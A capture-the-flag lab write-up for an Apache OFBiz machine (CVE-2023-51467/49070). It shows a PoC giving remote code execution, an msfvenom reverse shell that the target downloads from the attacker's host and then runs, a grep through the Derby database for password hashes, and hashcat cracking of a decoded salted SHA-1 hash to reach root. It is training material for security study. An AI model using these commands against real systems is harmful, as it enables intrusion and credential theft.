This is an Ubuntu machine running a vulnerable version of Apache OFBiz (CVE-2023-51467 and CVE-2023-49070). A PoC is used to attack the web server running on port 80 and get an initial foothold. The root password hash is found in the file system in base64url format.
The exploit is supposed to provide direct RCE when executed against the host. We will test whether it works by issuing a ping command.
> python3 exploit.py --url https://bizness.htb --cmd 'ping 10.10.xxx.xxx'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload
[+] The request has been successfully sent. Check the result of the command.
Once we have verified that the PoC provides direct RCE, the next step is to get a reverse shell on the host. For this, create an msfvenom payload and serve it with a Python web server. Also, start a listener on port 9000.
> msfvenom -p linux/x64/shell_reverse_tcp lhost=10.10.xxx.xxx lport=9000 -f elf -a x64
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell
> python3 -m http.server 80
Now use the PoC to download the shell payload onto the host and execute it.
> python3 exploit.py --url https://bizness.htb --cmd 'wget http://10.10.14.137/shell'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
> python3 exploit.py --url https://bizness.htb --cmd 'chmod +x ./shell'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
> python3 exploit.py --url https://bizness.htb --cmd './shell'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
A reverse shell is received on the listener; it can be used to get the user flag.
ROOT
From the low-privilege shell on the host, let's look for clear-text passwords contained in XML files on the filesystem, particularly under the /opt directory, where Apache OFBiz is installed.
Some SHA hashes are found, but none of them is useful. The next step is to look for passwords or hashes in the binary files of the Apache OFBiz Derby database.
> grep -E -i -a -o 'password(\W+\w+){0,5}' /opt/ofbiz/runtime/data/derby/ofbiz/seg0/*.dat
This command returns a hash contained in the file /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat.
Reading the Java code, we can see the hash is structured as: $SHA$ + SALT + $ + HASH BYTES. Also, it seems the hash bytes are base64url encoded.
Base64url encoding is just standard base64 encoding where the characters that are problematic in URLs, + and /, are replaced (and the = padding is dropped), so the resulting string can be used in URLs.
To obtain a crackable hash, we have to reverse the process. First we need to restore the replaced characters, and then decode the result using standard base64.
Transform base64url back to base64 by replacing _ with /, and - with +. The resulting base64 string is:
uP0/QaVBpDWFeo8+dRzDqRwXQ2I
Once we have the base64 string, we just decode it and convert the result to hex; the final hash obtained is:
b8fd3f41a541a435857a8f3e751cc3a91c174362
The final step is to crack the hash, taking into account the salt (d):
> hashcat -m 120 -a 0 -d 1 b8fd3f41a541a435857a8f3e751cc3a91c174362:d .\rockyou.txt
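As an added illustration (not code from the original writeup), the following Python reconstructs the base64url-to-hex conversion above and implements the check OFBiz performs at login, digest(salt + password), which is exactly the sha1($salt.$pass) layout hashcat mode 120 expects; it lets a defender confirm the hash format and decoding without a cracking tool. The full stored string `$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I` is assembled from the salt and base64url digest quoted on the page; the hash-type mapping and the sample password are assumptions.

```python
import base64
import hashlib
import hmac

# Hash type names as they appear in the stored string, mapped to hashlib
# names. "SHA" is the OFBiz default and means SHA-1 (assumption: the other
# entries mirror Java's MessageDigest naming).
HASH_TYPES = {"SHA": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def b64url_to_hex(digest: str) -> str:
    """Undo the URL-safe alphabet (- -> +, _ -> /), restore '=' padding, decode to hex."""
    std = digest.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)          # base64url drops padding; b64decode needs it
    return base64.b64decode(std, validate=True).hex()


def parse_ofbiz_hash(stored: str) -> tuple[str, str, str]:
    """Split '$TYPE$salt$base64url-digest' into (type, salt, hex digest)."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] not in HASH_TYPES:
        raise ValueError("not a recognised $TYPE$salt$digest string")
    _, hash_type, salt, digest = parts
    return hash_type, salt, b64url_to_hex(digest)


def make_ofbiz_hash(hash_type: str, salt: str, password: str) -> str:
    """Build a stored string in the on-disk layout: digest(salt || password),
    base64url encoded without padding."""
    h = hashlib.new(HASH_TYPES[hash_type])
    h.update(salt.encode())
    h.update(password.encode())
    digest = base64.urlsafe_b64encode(h.digest()).decode().rstrip("=")
    return f"${hash_type}${salt}${digest}"


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute digest(salt || candidate) and compare in constant time."""
    hash_type, salt, expected_hex = parse_ofbiz_hash(stored)
    h = hashlib.new(HASH_TYPES[hash_type])
    h.update(salt.encode())
    h.update(candidate.encode())
    return hmac.compare_digest(h.hexdigest(), expected_hex)


if __name__ == "__main__":
    # Stored string assembled from the salt and base64url digest quoted above.
    print(parse_ofbiz_hash("$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"))
    # Constructed sample: generate a hash ourselves, then check it both ways.
    sample = make_ofbiz_hash("SHA", "d", "constructed-sample-password")
    print(sample, verify_password(sample, "constructed-sample-password"),
          verify_password(sample, "not-the-password"))
```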
The resulting password is used with su to become root and retrieve the root flag as the superuser.